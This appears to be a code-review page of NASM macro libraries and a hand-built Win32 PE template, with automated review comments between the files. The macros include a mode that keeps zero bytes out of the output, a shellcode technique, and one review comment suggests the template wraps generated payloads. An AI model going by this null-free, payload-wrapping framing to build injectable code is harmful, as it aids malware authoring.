; MACROS FOR FUNCTION DECLARATIONS v0.9a
|
||||
; ======================================
|
||||
|
||||
|
||||
;gérer les appels de fonctions externes C (linux)
|
||||
;return() ?
|
||||
|
||||
|
||||
;FUNCTION.INC_CONVENTION = C|Std = convention d'appel des fonctions par défaut
|
||||
|
||||
|
||||
;FunctionDefine alias,C|Std|Pascal [,adresse]
|
||||
; -> FunctionDefine_alias = C|Std|Pascal
|
||||
; @alias = adresse de la fonction
|
||||
; alias$ (si aucun paramètre)
|
||||
; alias([p1,...]) (si plusieurs paramètres)
|
||||
|
||||
;Function alias, [,p1,...]
|
||||
; <- FunctionDefine
|
||||
; -> @alias = adresse de la fonction
|
||||
; Function_EBP ebp
|
||||
; Function_EIP byte ebp+4
|
||||
;[FunctionResd nom,nombre d]
|
||||
;[FunctionResw nom,nombre w]
|
||||
;[FunctionResb nom,nombre b]
|
||||
;...
|
||||
;FunctionBegin
|
||||
; <- Sub
|
||||
; ...
|
||||
;FunctionEnd
|
||||
; <- FUNCTION.INC_CONVENTION,BYTE.INC_NO_00
|
||||
|
||||
;FunctionCall alias, [,p1,...]
|
||||
; <- Push,Call,BYTE.INC_TEMPORARY_REGISTER(push & pop C)
|
||||
|
||||
;================================= General ===================================
|
||||
%ifndef _FUNCTION.INC
|
||||
%define _FUNCTION.INC
|
||||
|
||||
%include "byte.inc"
|
||||
|
||||
%macro FUNCTION.INC 0
|
||||
BYTE.INC
|
||||
%define FUNCTION.INC_CONVENTION C
|
||||
%endmacro
|
||||
|
||||
%macro FUNCTION.INC~ 0
|
||||
BYTE.INC~
|
||||
%define FUNCTION.INC_CONVENTION C
|
||||
%endmacro
|
||||
|
||||
FUNCTION.INC
|
||||
|
||||
%macro FunctionDefine 2-3
|
||||
%define FunctionDefine_%1 %2
|
||||
%if %0==3
|
||||
%ifnidni %3,@%1
|
||||
%define @%1 %3
|
||||
%endif
|
||||
%endif
|
||||
%define %1$ FunctionCall %1
|
||||
%define %1(p1) FunctionCall %1,p1
|
||||
%define %1(p1,p2) FunctionCall %1,p1,p2
|
||||
%define %1(p1,p2,p3) FunctionCall %1,p1,p2,p3
|
||||
%define %1(p1,p2,p3,p4) FunctionCall %1,p1,p2,p3,p4
|
||||
%define %1(p1,p2,p3,p4,p5) FunctionCall %1,p1,p2,p3,p4,p5
|
||||
%define %1(p1,p2,p3,p4,p5,p6) FunctionCall %1,p1,p2,p3,p4,p5,p6
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19,p20) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19,p20
|
||||
%endmacro
|
||||
|
||||
;================================= Function ==================================
|
||||
%macro Function 1-*
|
||||
FUNCTION.INC~
|
||||
%ifndef Function_%1
|
||||
%ifctx Function
|
||||
Error FUNCTION,Function =X=> Function
|
||||
%else
|
||||
%push Function
|
||||
%define Function_%1
|
||||
%define Function_Name_Define @%1
|
||||
%ifndef BYTE.INC_NO_00
|
||||
%define Function_EBP byte ebp
|
||||
%endif
|
||||
%define Function_EIP byte ebp+4
|
||||
FunctionDefine %1,FUNCTION.INC_CONVENTION
|
||||
%assign Function_Params_Assign 4
|
||||
%if %0>1
|
||||
%rotate 1
|
||||
%rep %0-1
|
||||
%assign Function_Params_Assign Function_Params_Assign+4
|
||||
%1_Equ equ Function_Params_Assign
|
||||
%define %1 byte ebp+%1_Equ
|
||||
%rotate 1
|
||||
%endrep
|
||||
%endif
|
||||
%assign Function_Locals_Assign 0
|
||||
%endif
|
||||
%undef Function_Exist_Define
|
||||
%else
|
||||
%define Function_Exist_Define
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro FunctionResd 2
|
||||
%ifndef Function_Exist_Define
|
||||
%ifctx Function
|
||||
%assign Function_Locals_Assign Function_Locals_Assign+%2*4
|
||||
%1_Equ equ Function_Locals_Assign
|
||||
%if (Function_Locals_Assign < 256)
|
||||
%define %1 byte ebp-%1_Equ
|
||||
%else
|
||||
%define %1 dword ebp-%1_Equ
|
||||
%ifdef BYTE.INC_NO_00
|
||||
Warning FUNCTION,FunctionResd %1,%2 => 00 ?
|
||||
%endif
|
||||
%endif
|
||||
%else
|
||||
Error FUNCTION,FunctionResd => Function
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro FunctionResw 2
|
||||
%ifndef Function_Exist_Define
|
||||
%ifctx Function
|
||||
%assign Function_Locals_Assign Function_Locals_Assign+%2*2
|
||||
%1_Equ equ Function_Locals_Assign
|
||||
%if (Function_Locals_Assign < 256)
|
||||
%define %1 byte ebp-%1_Equ
|
||||
%else
|
||||
%define %1 dword ebp-%1_Equ
|
||||
%ifdef BYTE.INC_NO_00
|
||||
Warning FUNCTION,FunctionResw %1,%2 => 00 ?
|
||||
%endif
|
||||
%endif
|
||||
%else
|
||||
Error FUNCTION,FunctionResw => Function
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro FunctionResb 2
|
||||
%ifndef Function_Exist_Define
|
||||
%ifctx Function
|
||||
%assign Function_Locals_Assign Function_Locals_Assign+%2
|
||||
%1_Equ equ Function_Locals_Assign
|
||||
%if (Function_Locals_Assign < 256)
|
||||
%define %1 byte ebp-%1_Equ
|
||||
%else
|
||||
%define %1 dword ebp-%1_Equ
|
||||
%ifdef BYTE.INC_NO_00
|
||||
Warning FUNCTION,FunctionResb %1,%2 => 00 ?
|
||||
%endif
|
||||
%endif
|
||||
%else
|
||||
Error FUNCTION,FunctionResb => Function
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro FunctionBegin 0
|
||||
%ifndef Function_Exist_Define
|
||||
%ifctx Function
|
||||
Function_Name_Define:
|
||||
%define BYTE.INC_TEMPORARY_REGISTER eax
|
||||
%if (Function_Params_Assign>4)||(Function_Locals_Assign>0)
|
||||
push ebp
|
||||
mov ebp,esp
|
||||
%endif
|
||||
%if Function_Locals_Assign>0
|
||||
Sub esp,Function_Locals_Assign
|
||||
%endif
|
||||
; enter Function_Locals_Assign,0
|
||||
%undef BYTE.INC_TEMPORARY_REGISTER
|
||||
%else
|
||||
Error FUNCTION,FunctionBegin => Function
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro FunctionEnd 0
|
||||
%ifndef Function_Exist_Define
|
||||
%ifctx Function
|
||||
%if (Function_Params_Assign>4)||(Function_Locals_Assign>0)
|
||||
leave
|
||||
%endif
|
||||
%ifnidni FUNCTION.INC_CONVENTION,C
|
||||
%if Function_Params_Assign==4
|
||||
ret
|
||||
%elifndef BYTE.INC_NO_00
|
||||
ret Function_Params_Assign-4
|
||||
%else
|
||||
Error FUNCTION,NO_00 =X=> CONVENTION Std
|
||||
%endif
|
||||
%else
|
||||
ret
|
||||
%endif
|
||||
%undef Function_Name_Define
|
||||
%pop
|
||||
%else
|
||||
Error FUNCTION,FunctionEnd => Function
|
||||
%endif
|
||||
%endif
|
||||
%undef Function_Exist_Define
|
||||
FUNCTION.INC~
|
||||
%endmacro
|
||||
|
||||
;=================================== Call ====================================
|
||||
%macro FunctionCallStd 1-*
|
||||
%define BYTE.INC_TEMPORARY_REGISTER eax
|
||||
%rep %0-1
|
||||
%rotate -1
|
||||
Push %1
|
||||
%endrep
|
||||
Call FunctionCall_Address_Define
|
||||
%undef BYTE.INC_TEMPORARY_REGISTER
|
||||
%endmacro
|
||||
|
||||
%macro FunctionCallPascal 1-*
|
||||
%define BYTE.INC_TEMPORARY_REGISTER eax
|
||||
%rep %0-1
|
||||
%rotate 1
|
||||
Push %1
|
||||
%endrep
|
||||
Call FunctionCall_Address_Define
|
||||
%undef BYTE.INC_TEMPORARY_REGISTER
|
||||
%endmacro
|
||||
|
||||
%macro FunctionCallC 1-*
|
||||
%ifndef BYTE.INC_NO_00
|
||||
%define BYTE.INC_TEMPORARY_REGISTER eax
|
||||
%else
|
||||
%ifdef BYTE.INC_TEMPORARY_REGISTER
|
||||
%ifidni BYTE.INC_TEMPORARY_REGISTER,eax
|
||||
Error FUNCTION,NO_00 => TEMPORARY_REGISTER <> eax
|
||||
%endif
|
||||
%else
|
||||
Error FUNCTION,NO_00 => TEMPORARY_REGISTER
|
||||
%endif
|
||||
%endif
|
||||
%rep %0-1
|
||||
%rotate -1
|
||||
Push %1
|
||||
%endrep
|
||||
Call FunctionCall_Address_Define
|
||||
%if %0>1
|
||||
%ifndef BYTE.INC_NO_00
|
||||
%assign FunctionCallC_Assign (%0-1)*4
|
||||
add esp,FunctionCallC_Assign
|
||||
%undef BYTE.INC_TEMPORARY_REGISTER
|
||||
%else
|
||||
%ifdef BYTE.INC_TEMPORARY_REGISTER
|
||||
%rep %0-1
|
||||
pop BYTE.INC_TEMPORARY_REGISTER
|
||||
%endrep
|
||||
%else
|
||||
Error FUNCTION,NO_00 => TEMPORARY_REGISTER
|
||||
%endif
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;FunctionCall nom fonction [,p1,...]
|
||||
%macro FunctionCall 1-2+
|
||||
%ifdef FunctionDefine_%1
|
||||
%define FunctionCall_Address_Define @%1
|
||||
%ifidni FunctionDefine_%1,Std
|
||||
%if %0==1
|
||||
FunctionCallStd %1
|
||||
%else
|
||||
FunctionCallStd %1,%2
|
||||
%endif
|
||||
%elifidni FunctionDefine_%1,Pascal
|
||||
%if %0==1
|
||||
FunctionCallPascal %1
|
||||
%else
|
||||
FunctionCallPascal %1,%2
|
||||
%endif
|
||||
%else
|
||||
%if %0==1
|
||||
FunctionCallC %1
|
||||
%else
|
||||
FunctionCallC %1,%2
|
||||
%endif
|
||||
%endif
|
||||
%undef FunctionCall_Address_Define
|
||||
%else
|
||||
%if %0==1
|
||||
Error FUNCTION,FunctionCall %1
|
||||
%else
|
||||
Error FUNCTION,FunctionCall %1,%2
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%endif
|
|
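--- /dev/null
+++ b/[path not on page; include guard _LANGUAGE.INC]
@@ -0,0 +1,328 @@
+; MACROS FOR STRUCTURATED PROGRAMMING v0.9a
+; =========================================
+
+
+;Continue
+;Break
+
+;IfJmp {valeur1},condition,valeur2,l [,-1|+1]
+;IfNotJmp {valeur1},condition,valeur2,l [,-1|+1]
+;If {valeur1},condition,valeur2
+;IfX condition asm
+; ...
+;[Else]
+; [...]
+;EndIf
+
+;Switch v
+;Case v1
+;...
+;[Default]
+; [...]
+;EndSwitch
+; les conditions Case sont évaluées juste avant leur exécution, à la
+; différence du C !!!
+
+;While [{valeur1},condition,valeur2]
+; ...
+;EndWhile [{valeur1},condition,valeur2]
+
+;Until [{valeur1},condition,valeur2]
+; ...
+;EndUntil [{valeur1},condition,valeur2]
+
+;For compteur,valeur_début,condition,valeur_fin,valeur_incrément
+; ...
+;EndFor
+
+;================================= General ===================================
+%ifndef _LANGUAGE.INC
+%define _LANGUAGE.INC
+
+%include "byte.inc"
+
+;============================= Continue-Break ================================
+%macro Continue 0
+%ifdef %$BeginEnd
+Jmp %$Begin,-1
+%elifdef %$$BeginEnd
+Jmp %$$Begin,-1
+%elifdef %$$$BeginEnd
+Jmp %$$$Begin,-1
+%elifdef %$$$$BeginEnd
+Jmp %$$$$Begin,-1
+%elifdef %$$$$$BeginEnd
+Jmp %$$$$$Begin,-1
+%elifdef %$$$$$$BeginEnd
+Jmp %$$$$$$Begin,-1
+%elifdef %$$$$$$$BeginEnd
+Jmp %$$$$$$$Begin,-1
+%elifdef %$$$$$$$$BeginEnd
+Jmp %$$$$$$$$Begin,-1
+%elifdef %$$$$$$$$$BeginEnd
+Jmp %$$$$$$$$$Begin,-1
+%elifdef %$$$$$$$$$$BeginEnd
+Jmp %$$$$$$$$$$Begin,-1
+%else
+Error LANGUAGE,Continue => 10 blocs maximum
+%endif
+%endmacro
+
+%macro Break 0
+%ifdef %$BeginEnd
+Jmp %$End,+1
+%elifdef %$$BeginEnd
+Jmp %$$End,+1
+%elifdef %$$$BeginEnd
+Jmp %$$$End,+1
+%elifdef %$$$$BeginEnd
+Jmp %$$$$End,+1
+%elifdef %$$$$$BeginEnd
+Jmp %$$$$$End,+1
+%elifdef %$$$$$$BeginEnd
+Jmp %$$$$$$End,+1
+%elifdef %$$$$$$$BeginEnd
+Jmp %$$$$$$$End,+1
+%elifdef %$$$$$$$$BeginEnd
+Jmp %$$$$$$$$End,+1
+%elifdef %$$$$$$$$$BeginEnd
+Jmp %$$$$$$$$$End,+1
+%elifdef %$$$$$$$$$$BeginEnd
+Jmp %$$$$$$$$$$End,+1
+%else
+Error LANGUAGE,Break => 10 blocs maximum
+%endif
+%endmacro
+
+;==================================== If =====================================
+%macro IfJmp 4+
+MultiParams %1
+%if MultiParams_Ret==1
+Cmp %1,%3
+%else
+%1
+Cmp eax,%3
+%endif
+%ifidni %2,==
+JX e,%4
+%elifidni %2,!=
+JX ne,%4
+%elifidni %2,<
+JX b,%4
+%elifidni %2,>
+JX a,%4
+%elifidni %2,<=
+JX be,%4
+%elifidni %2,>=
+JX ae,%4
+%else
+Error LANGUAGE,IfJmp v1,condition,v2,label
+%endif
+%endmacro
+
+%macro IfNotJmp 4+
+MultiParams %1
+%if MultiParams_Ret==1
+Cmp %1,%3
+%else
+%1
+Cmp eax,%3
+%endif
+%ifidni %2,==
+JX ne,%4
+%elifidni %2,!=
+JX e,%4
+%elifidni %2,<
+JX ae,%4
+%elifidni %2,>
+JX be,%4
+%elifidni %2,<=
+JX a,%4
+%elifidni %2,>=
+JX b,%4
+%else
+Error LANGUAGE,IfNotJmp v1,condition,v2,label
+%endif
+%endmacro
+
+
+%macro If 3
+%push If
+MultiParams %1
+%if MultiParams_Ret==1
+IfNotJmp %1,%2,%3,%$If_Not,+1
+%else
+IfNotJmp {%1},%2,%3,%$If_Not,+1
+%endif
+%endmacro
+
+%macro IfX 1
+%push If
+JnX %1,%$If_Not,+1
+%endmacro
+
+%macro Else 0
+%ifctx If
+Jmp %$If_End,+1
+%$If_Not:
+%repl Else
+%else
+Error LANGUAGE,Else => If | IfX
+%endif
+%endmacro
+
+%macro EndIf 0
+%ifctx If
+%$If_Not:
+%pop
+%elifctx Else
+%$If_End:
+%pop
+%else
+Error LANGUAGE,EndIf => If | IfX | Else
+%endif
+%endmacro
+
+;================================== Switch ===================================
+%macro Switch 1
+%push Switch
+%define %$BeginEnd
+%define %$Switch_V_Define %1
+%$Begin:
+%endmacro
+
+%macro Case 1
+%ifdef %$Switch_NeedEndIf_Define
+EndIf
+%endif
+%ifctx Switch
+If %$Switch_V_Define,==,%1
+%define %$Switch_NeedEndIf_Define
+%else
+Error LANGUAGE,Case => Switch
+%endif
+%endmacro
+
+%macro Default 0
+%ifdef %$Switch_NeedEndIf_Define
+EndIf
+%endif
+%ifctx Switch
+%else
+Error LANGUAGE,Default => Switch
+%endif
+%endmacro
+
+%macro EndSwitch 0
+%ifdef %$Switch_NeedEndIf_Define
+EndIf
+%endif
+%ifctx Switch
+%$End:
+%pop
+%else
+Error LANGUAGE,EndSwitch => Switch
+%endif
+%endmacro
+
+;================================== While ====================================
+%macro While 0-3
+%push While
+%define %$BeginEnd
+%$Begin:
+%if %0!=0
+MultiParams %1
+%if MultiParams_Ret==1
+IfNotJmp %1,%2,%3,%$End,+1
+%else
+IfNotJmp {%1},%2,%3,%$End,+1
+%endif
+%endif
+%endmacro
+
+%macro EndWhile 0-3
+%ifctx While
+%if %0!=0
+MultiParams %1
+%if MultiParams_Ret==1
+IfJmp %1,%2,%3,%$Begin,-1
+%else
+IfJmp {%1},%2,%3,%$Begin,-1
+%endif
+%else
+Continue
+%endif
+%$End:
+%pop
+%else
+Error LANGUAGE,EndWhile => While
+%endif
+%endmacro
+
+;================================== Until ====================================
+%macro Until 0-3
+%push Until
+%define %$BeginEnd
+%$Begin:
+%if %0!=0
+MultiParams %1
+%if MultiParams_Ret==1
+IfJmp %1,%2,%3,%$End,+1
+%else
+IfJmp {%1},%2,%3,%$End,+1
+%endif
+%endif
+%endmacro
+
+%macro EndUntil 0-3
+%ifctx Until
+%if %0!=0
+MultiParams %1
+%if MultiParams_Ret==1
+IfNotJmp %1,%2,%3,%$Begin,-1
+%else
+IfNotJmp {%1},%2,%3,%$Begin,-1
+%endif
+%else
+Continue
+%endif
+%$End:
+%pop
+%else
+Error LANGUAGE,EndUntil => Until
+%endif
+%endmacro
+
+;=================================== For =====================================
+%macro For 5
+%push For
+%define %$BeginEnd
+%define %$For_1_Define %1
+%define %$For_5_Define %5
+Mov %1,%2
+%$Begin:
+MultiParams %1
+%if MultiParams_Ret==1
+IfNotJmp %1,%3,%4,%$End,+1
+%else
+IfNotJmp {%1},%3,%4,%$End,+1
+%endif
+%endmacro
+
+%macro EndFor 0
+%ifctx For
+%if %$For_5_Define>0
+Add %$For_1_Define,%$For_5_Define
+%elif %$For_5_Define<0
+Sub %$For_1_Define,-%$For_5_Define
+%else
+%endif
+Continue
+%$End:
+%pop
+%else
+Error LANGUAGE,EndFor => For
+%endif
+%endmacro
+
+%endif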
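Review bot: The `<`, `>`, `<=`, `>=` conditions in IfJmp (L3669–L3687) and IfNotJmp (L3743–L3761) expand to the unsigned jumps `b`/`a`/`be`/`ae`, and the usage header (L3369–L3449) does not say so, so a `For`/`While` counter that goes negative compares as a large unsigned value and the loop bound is silently wrong. Suggest adding under the `;If` line: `; <,>,<=,>= compare unsigned (jb/ja/jbe/jae); use IfX with l/g/le/ge for signed operands` — this assumes the JX/JnX macros from byte.inc accept those condition names the way they accept `e`/`ne`, which is not visible here. Separately, the `%else` branch of EndFor for a zero increment (L4274–L4277) is empty, so `For` with step 0 assembles to a loop that never advances its counter; an `Error LANGUAGE,EndFor => increment 0` in that branch would reject it at assembly time.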
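--- /dev/null
+++ b/[path not on page; include guard _NASM.INC]
@@ -0,0 +1,54 @@
+; GENERAL MACROS FOR NASM v1.0a
+; =============================
+
+
+;NASM.INC_NO_WARNING => ne pas afficher les warnings utilisateurs
+
+
+;Error include(sans .INC),message
+;Warning include(sans .INC),message
+
+;MultiParams p
+; -> MultiParams_Ret = nombre de paramètres
+
+;================================= General ===================================
+%ifndef _NASM.INC
+%define _NASM.INC
+
+%push _NASM.INC ;pour éviter erreurs %ifctx
+
+%macro NASM.INC 0
+%undef NASM.INC_NO_WARNING
+%assign ErrorWarning_Assign 0
+%endmacro
+
+%macro NASM.INC~ 0
+NASM.INC
+%endmacro
+
+NASM.INC
+
+%macro Error 2+
+ErrorWarningNext
+%error %1.INC error: %2
+%endmacro
+
+%macro Warning 2+
+%ifndef NASM.INC_NO_WARNING
+ErrorWarningNext
+%error %1.INC warning: %2
+%endif
+%endmacro
+
+%macro ErrorWarningNext 0
+%assign ErrorWarning_Assign ErrorWarning_Assign+1
+%if ErrorWarning_Assign==1
+%error ===============================================
+%endif
+%endmacro
+
+%macro MultiParams 1-*
+%define MultiParams_Ret %0
+%endmacro
+
+%endif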
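Review bot: `Warning` reports through `%error` (L4411), exactly as `Error` does (L4394), so a "warning" is surfaced to nasm as an assembly error and the only difference between the two macros is the message text; neither the header comment (L4329) nor the macro says this. If the nasm version this build relies on supports the `%warning` directive, that is the right call here; otherwise document it next to the macro: `; NOTE: uses %error, so a Warning is reported as an error like Error; NASM.INC_NO_WARNING only suppresses the message`. As written, the `NASM.INC_NO_WARNING` define (L4405) makes the same source pass or fail depending on a preprocessor switch, which is worth stating in the usage header at L4319.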
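--- /dev/null
+++ b/[path not on page; PE template .asm]
@@ -0,0 +1,112 @@
+; PE FILE STRUCTURE
+; =================
+
+%include "pe.inc"
+
+BIN_Begin
+MZHeader
+MZExtendedHeader
+MZSection.text_Begin
+push cs
+pop ds
+mov dx,MZSection.text_VA(text_string)
+mov ah,09
+int 21h
+mov ax,4C01h
+int 21h
+text_string: db 'This program cannot be run in DOS mode.',0Dh,0Ah,'$'
+MZSection.text_End
+
+PEHeader
+%define PEOptionalheader_EipRVA PESection.text_RVA(mondebut)
+PEOptionalHeader_Begin
+PEOptionalHeader_Directory Export,0,0
+PEOptionalHeader_Directory Import,Import_Directorys_RVA,Import_Directorys_VS
+; PEOptionalHeader_Directory Resource,0,0
+; PEOptionalHeader_Directory Exception,0,0
+; PEOptionalHeader_Directory Security,0,0
+; PEOptionalHeader_Directory Relocations,0,0
+; PEOptionalHeader_Directory Debug,0,0
+; PEOptionalHeader_Directory ImageDescription,0,0
+; PEOptionalHeader_Directory MachineSpecific,0,0
+; PEOptionalHeader_Directory ThreadLocalStorage,0,0
+PEOptionalHeader_End
+
+PESectionHeader .text,'.text',PESectionHeader_Flags_EXECUTABLECODE | PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_EXECUTEACCESS | PESectionHeader_Flags_READACCESS
+PESectionHeader .rdata,'.rdata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
+PESectionHeader .data,'.data',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
+PESectionHeader .bss,'.bss', PESectionHeader_Flags_DATA0 | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
+PESectionHeader .idata,'.idata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
+PESections_Begin
+PESection.text_Begin
+int 03h
+mondebut:
+MB_OK equ 0
+mov eax,MB_OK
+push eax
+mov eax,PESection.rdata_VA(message)
+call [GetCommandLineA]
+push eax
+push eax
+mov eax,0
+push eax
+call [MessageBoxA]
+call [PESection.idata_VA(Import.KERNEL32.ExitProcess)]
+mov [PESection.text_VA(text1)],eax
+mov [PESection.rdata_VA(rdata1)],ebx
+mov [PESection.data_VA(data1)],ecx
+mov [PESection.bss_VA(bss1)],edx
+text1:
+jmp short mondebut
+PESection.text_End
+
+PESection.rdata_Begin
+message: db "coucou",0
+rdata1: times 1001h db 22h ;db 'data1'
+PESection.rdata_End
+
+PESection.data_Begin
+data1: times 1205h db 0FEh
+PESection.data_End
+
+PESection.bss_Begin
+bss1: resb 1001h
+PESection.bss_End
+
+PESection.idata_Begin
+Import_Directorys_Begin .idata
+Import_Directory KERNEL32
+Import_Directory USER32
+Import_Directorys_End
+
+Import_RVAs_Begin KERNEL32
+Import_RVA KERNEL32,GetCommandLineA
+Import_RVA KERNEL32,ExitProcess
+Import_RVAs_End
+Import_RVAs_Begin USER32
+Import_RVA USER32,MessageBoxA
+Import_RVAs_End
+
+Import_VAs_Begin KERNEL32
+Import_VA KERNEL32,GetCommandLineA,0BFF8C5ACh
+Import_VA KERNEL32,ExitProcess,0BFF8D4CAh
+Import_VAs_End
+Import_VAs_Begin USER32
+Import_VA USER32,MessageBoxA
+Import_VAs_End
+
+Import_Strings_Begin KERNEL32
+Import_String_Function KERNEL32,GetCommandLineA,"GetCommandLineA",0D0h
+Import_String_Function KERNEL32,ExitProcess,"ExitProcess",07Fh
+Import_String_Dll KERNEL32,"KERNEL32.DLL"
+Import_Strings_End
+Import_Strings_Begin USER32
+Import_String_Function USER32,MessageBoxA,"MessageBoxA"
+Import_String_Dll USER32,"USER32.DLL"
+Import_Strings_End
+PESection.idata_End
+
+
+
+PESections_End
+BIN_End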
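Review bot: The KERNEL32 entries at L4719 and L4722 pass fixed absolute addresses (`0BFF8C5ACh`, `0BFF8D4CAh`) as the third `Import_VA` argument, while the USER32 entry at L4731 leaves resolution to the loader. The `Import_VA` macro is defined outside this section, but if that argument pre-fills the IAT slot, the template is tied to one particular kernel32 build and on any other system the call lands on whatever happens to live at that address; dropping the third argument, as for MessageBoxA, lets the loader fill the slot. Also, everything after the `ExitProcess` call at L4614 — the stores at L4617–L4626 and the `jmp short mondebut` at L4632 — is unreachable because ExitProcess does not return, and the stores into .text and .rdata would fault anyway since those section headers (L4557, L4560) grant no WRITEACCESS. If this file is the skeleton the build script wraps payloads in, that demo body should go and `mondebut:` should carry a comment such as `; entry point: generated payload body is inserted here`.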
@ -0,0 +1,654 @@
|
|||
;corriger ;???
|
||||
;raison inconnue ; ?
|
||||
|
||||
|
||||
;gestion message d'erreur structures (%error)
|
||||
; %define et %ifdef pour tester l'existence de header n‚cessaires
|
||||
; (pour ‚viter les erreurs de label ind‚finis)
|
||||
|
||||
;.edata,.rsrc (icones)
|
||||
|
||||
;supprimer macro Directories ? (calcul automatique ?)
|
||||
|
||||
|
||||
; MACROS AND DEFINITIONS FOR PE FILES v1.0a
|
||||
; =========================================
|
||||
;By rix-shogun-agressor (erix@mail.dotcom.fr,rix@dreamnet.org)
|
||||
|
||||
;conventions:
|
||||
;xxx_VA: adresse virtuelle (adresse en m‚moire)
|
||||
;xxx_RVA: d‚placement d'adresse virtuel (offset d'adresse en m‚moire%baseVA)
|
||||
;xxx_VS: taille virtuelle (taille en m‚moire)
|
||||
;xxx_FS: taille fichier
|
||||
;xxx_FA: adresse fichier (offset dans le fichier)
|
||||
;xxx_Fa: file alignement
|
||||
;xxx-Va: virtual alignement (alignement m‚moire)
|
||||
;xxx_Assign: assignation pour un calcul ‚valu‚ plus tard
|
||||
;xxx_Define: definition pour un calcul ‚valu‚ plus tard dont une des valeurs
|
||||
; est toujours inconnue
|
||||
;xxx_Ifctx: macros pour regrouper plusieurs %ifctx
|
||||
;xxx: valeur
|
||||
|
||||
;sections: text,
|
||||
;macros de d‚finitions des header: NOM[SousNom]_Begin NOM[SousNom]_End
|
||||
; ou bien: NOM[SousNom]
|
||||
;define de d‚finitions des headers: NOM[SousNom]_Xxx
|
||||
;definition de constantes des header: NOM[SousNom]_XXX
|
||||
;nom interne aux macros NOMHeader NOM[SousNom]_Begin_FA NOM[SousNom]_End_FA
|
||||
|
||||
;MacroXXX:macros internes
|
||||
|
||||
;xxxx:normal
|
||||
;xxxxa:align‚ (V=>align‚ virtuel,F=>align‚ fichier)
|
||||
|
||||
;equ: valeur calcul‚e d'aprŠs nombres suivants l'endroit de stockage
|
||||
;%define: d‚claration des constantes utilisables par l'utilisateur
|
||||
;%assign: d‚claration des variables internes pour les calculs d'equ (_Assign)
|
||||
|
||||
;================================= BIN Begin =================================
|
||||
%ifndef PE.INC
|
||||
%define PE.INC
|
||||
%push PE.INC
|
||||
|
||||
%include "language.inc"
|
||||
|
||||
%macro BIN_Begin 0
|
||||
SECTION .text
|
||||
BIN_Begin_FA:
|
||||
%push BIN_Begin
|
||||
%endmacro
|
||||
|
||||
;================================= MZ Header =================================
|
||||
%define MZHeader_MinimumMemory 0 ;en paragraphes, … ajouter en fin de m‚moire
|
||||
%define MZHeader_MaximumMemory 0FFFFh ;en paragraphes, … ajouter en fin de m‚moire
|
||||
%define MZHeader_Ss 0000h
|
||||
%define MZHeader_Sp 00B8h ; ?
|
||||
%define MZHeader_Ip 0000h
|
||||
%define MZHeader_Cs 0000h
|
||||
|
||||
%macro MZHeader 0
|
||||
%ifctx BIN_Begin
|
||||
BITS 16
|
||||
MZHeader_Begin_FA:
|
||||
MZHeader_Signature_FA: db 'MZ'
|
||||
MZHeader_LastPageBytes_FA: dw (BIN_End_FAa-BIN_Begin_FA) % 512
|
||||
MZHeader_PagesNumber_FA: dw (BIN_End_FAa-BIN_Begin_FA)/512+1
|
||||
